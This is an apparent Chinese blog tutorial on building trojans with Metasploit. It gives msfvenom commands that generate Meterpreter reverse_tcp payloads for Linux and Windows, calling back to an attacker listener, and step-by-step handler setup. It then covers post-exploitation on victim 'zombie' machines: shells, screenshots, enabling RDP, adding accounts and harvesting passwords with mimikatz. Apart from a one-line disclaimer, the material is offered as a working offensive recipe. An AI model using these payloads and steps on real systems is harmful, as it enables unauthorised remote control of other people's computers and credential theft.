黑客攻擊-木馬程序(1)

原創 BurningTeng 2020-06-29 05:05

聲明:禁止用作非法目的,謝絕一切形式的轉載。

當你在無意間點擊一個鏈接後,當你在不明情況安裝一個程序時,當你忍不住點擊一個美女圖片的時候,你的設備可能就此淪陷了,成爲了黑客眼中的"肉雞"。

文章目錄

kali Linux

Kali Linux是基於Debian的Linux發行版, 設計用於數字取證操作系統。由Offensive Security Ltd維護和資助。最先由Offensive Security的Mati Aharoni和Devon Kearns通過重寫BackTrack來完成,BackTrack是他們之前寫的用於取證的Linux發行版 。

Metersploit

Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智能開發,代碼審計,Web應用程序掃描,社會工程。團隊合作,在Metasploit和綜合報告提出了他們的發現。

Meterpreter

Meterpreter是 Metasploit 框架中的一個殺手鐗,通常作爲漏洞溢出後的攻擊使用, 攻擊觸發發漏洞後能夠返回給我們一個控制通道.

Linux攻擊

生成木馬

網絡上有好多生成木馬的方式,但是大多數都是相互copy,甚至有的還可能包含病毒,謹慎使用。網絡上下載的所有軟件都要慎用,除非是在官網上下載的。
生成一個使用於Lnux 64位系統的木馬,生成木馬的命令如下:

msfvenom -a x64 --platform linux  -p linux/x64/meterpreter/reverse_tcp  LHOST=192.168.42.49 LPORT=5555  -i 3 -f elf -o test

LHOST 代表Listening host。LPORT代表Listening port。後續介紹網絡的時候會詳細講解。

翻譯一下這個命令:平臺Linux x64架構,使用payload是linux/x64/meterpreter/reverse_tcp,目標文件的格式是elf。可執行目標文件的名稱是test。
通過上面的命令,我們就就可以生成一個elf格式的test程序,當在遠端(也就是"肉雞")執行這個程序的時候,如果本地開啓了監聽,肉雞和本機之間就建立了一條通信的channel,通過這個木馬就能實現控制遠端的肉雞了,邪惡的微笑。

開啓監聽

  1. 開啓msf
msfconsole
  1. 加載模塊
msf5 > use exploit/multi/handler
  1. 設置payload
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
  1. 設置監聽ip
msf5 exploit(multi/handler) > set lhost 192.168..42.49
  1. 設置監聽port
msf5 exploit(multi/handler) > set LPORT 5555
  1. 執行
msf5 exploit(multi/handler) > exploit

攻擊效果

當執行完exploit之後,我們可以獲得一個Meterpreter。通過這個meterpreter,可以查看肉雞中的文件,進程等。
在這裏插入圖片描述可以開啓一個shell,這樣基本等同於完全操控目標計算機了。
在這裏插入圖片描述
在這裏插入圖片描述通過查看whoami可知正是當前登陸用戶的帳號。如何提升權限,後續會介紹。

Windows攻擊

生成木馬

msfvenom -a x64 --platform windows  -p windows/x64/meterpreter/reverse_tcp  LHOST=192.168.42.49 LPORT=4444  -i 3 -f exe -o payload_test.exe

具體含義可參考上文。

開啓監聽

  1. 開啓msf
msfconsole
  1. 加載模塊
msf5 > use exploit/multi/handler
  1. 設置payload
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
  1. 設置監聽ip
msf5 exploit(multi/handler) > set lhost 192.168..42.49
  1. 設置監聽port
msf5 exploit(multi/handler) > set LPORT 4444
  1. 執行
msf5 exploit(multi/handler) > exploit

攻擊效果

當執行完exploit之後,我們可以獲得一個Meterpreter。通過這個meterpreter,可以查看肉雞中的文件,進程等。同Linux。
在這裏插入圖片描述查看那getuid是Administrator,管理員權限。在Windows下,這還不是最高的權限,最高的權限是system,至於如何提權,後續會講解。

在這裏插入圖片描述開啓一個shell,發現有亂碼,這是由於Linux和Windows採用的編碼方式不一致導致的。可以通過chcp 65001解決這個問題。

桌面截圖

在這裏插入圖片描述

開啓遠程桌面

通過以下命令開啓rdp服務

run post/windows/manager/enable_rdp

如圖:
在這裏插入圖片描述

添加用戶

在這裏插入圖片描述

帳號密碼破解

使用minikatz進行密碼破解
在這裏插入圖片描述

遠程桌面

通過rdestop 目標ip -u 賬戶,可以實現遠程桌面的控制。
在這裏插入圖片描述
在這裏插入圖片描述

公衆號

瞭解更多網絡安全內容,歡迎關注我的公衆號:無情劍客
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

黑客攻擊-木馬程序(3)

聲明:禁止用作非法目的,謝絕一切形式的轉載。 當你在登陸某個網站的時候,當你在用ftp登陸傳輸文件的時候,你的密碼可能已經被嗅探到了。黑客利用網絡嗅探可以獲取大量有用的信息。 文章目錄預備條件網絡抓包代理服務器代理服務器抓包原理網

BurningTeng 2020-07-08 07:19:40

strcmp的坑

strcmp的坑 下面的程序是通過對輸入進行判斷,來決定輸出內容的。 # include<stdio.h> #include<string.h> int main(){ printf("請輸入: "); char

BurningTeng 2020-07-03 18:43:21

OpenProcessToken這個函數用法

  GetCurrentProcessID 得到當前進程的ID OpenProcessToken得到進程的令牌句柄LookupPrivilegeValue 查詢進程的權限AdjustTokenPrivileges 調整令牌權限 要對一個任

cuboo 2020-07-07 04:34:34

【轉】 Winsock工作模型

首先得弄清楚同步、異步、阻塞、非阻塞的概念。同步和異步是針對通訊的工作模式,阻塞和非阻塞是指socket的I/O操作。實際上對於socket,只存在阻塞和非阻塞,同步與異步是在程序實現上有所不同。以阻塞的方式執行recv函數,在沒有收到

cuboo 2020-07-07 04:34:34

MFC的單文檔中添加按鈕及按鈕事件

1、添加CButton對象到View類(XxxView頭文件中)中class CLinkGameView : public CView { //成員

Lion小礼 2020-07-06 05:47:04

Windows安全補丁檢

主要通過WUA API實現,源代碼如下: #include <wuapi.h> #pragma comment(lib, "comsupp.lib") //檢測操作系統安全補丁是否最新 BOOL DetectSecPatch() {

zhangjie121 2020-07-01 05:48:38

安卓口令紅包漏洞破解方法“如何搶到非蘋果用戶不能搶到的紅包”

      最近在各大媒體網站如微信朋友圈,QQ空間以及一些各種聯盟上都出現了一條“非蘋果用戶不能搶的口令紅包”。該紅包通過利用安卓手機的漏洞實現,而對於蘋果機則不影響。       紅包發生方法如下:              1.在手

J_Anson 2020-07-07 12:30:52

CVE-2016-1503 漏洞分析

CVE-2016-1503 漏洞分析 一、漏洞成因 首先來看一下官方的描述: “A vulnerability in the Dynamic Host Configuration Protocol service cou

Ericky_ 2020-07-07 09:10:22

阿強成長之--漏洞安全

開篇(這種思想很重要) 漏洞不是後來纔出現的,也不一定是碼農的編寫問題和其他因素造成的,他是從一開始就客觀存在的,只是我們沒有發現它,隨着時間的推長和技術的跟新以及技術宅們的利益問題,這才導致漏洞的出現,其實你所發現bug其實一直

阿强成长之路 2020-07-07 00:08:03

利用Redis寫文件權限進行ssh提權登陸linux的漏洞

原理 利用redis的config命令修改rdb文件地址爲ssh密鑰文件,向redis中寫入公共密鑰,通過save命令手動刷新到rdb中,此時就可以用私鑰登陸了 操作 在本地電腦中(linux爲例)生成無密碼的密鑰 ssh-key

Vincent_Field 2020-07-05 06:33:54

Windows XP 命令行 - COPY 命令詳解

將一份或多份文件複製到另一個位置。 COPY [/D] [/V] [/N] [/Y | /-Y] [/Z] [/A | /B ] source [/A | /B] [+ source [/A | /B] [+ ...]] [d

piaolankeke 2020-07-03 22:00:01

Ms04011漏洞

呵呵,大家都應知道這個漏洞吧,哈哈,它好厲害哦。HACKER們利用它來可以得到操作系統的administrators權限,得到系統的shell。不多說別的,看看他們都是入何入侵別人的機器吧。   1.  首先,去下載ms04011漏洞溢出

carbon107 2020-07-03 13:42:41

漏洞預警 | Apache AXIS freemarker組件遠程命令執行(哨兵雲支持檢測)

Apache AXIS2是一個基於SOAP的一種Web Service框架。2019年06月16日晚,廣東省安全中心發佈0day漏洞安全預警,Apache AXIS中的freemarker組件中存在遠程命令執行攻擊。默安科技的哨兵

ots安全 2020-07-03 05:38:09

一個簡單的聊天系統

聲明:謝絕一切形式的轉載 socket套接字 socket起源於Unix,而Unix/Linux基本哲學之一就是“一切皆文件”,都可以用“打開open –> 讀寫write/read –> 關閉close”模式來操作。Socket

BurningTeng 2020-07-02 22:16:56

漏洞-Windows-CVE-2020-0796

環境: 目標:192.168.107.74,windows10專業版 1903 攻擊者:192.168.103.61 SMBGhost_RCE_PoC 影響版本: Windows 10 Version 1903 for 32-b

山下南徒 2020-07-01 10:53:47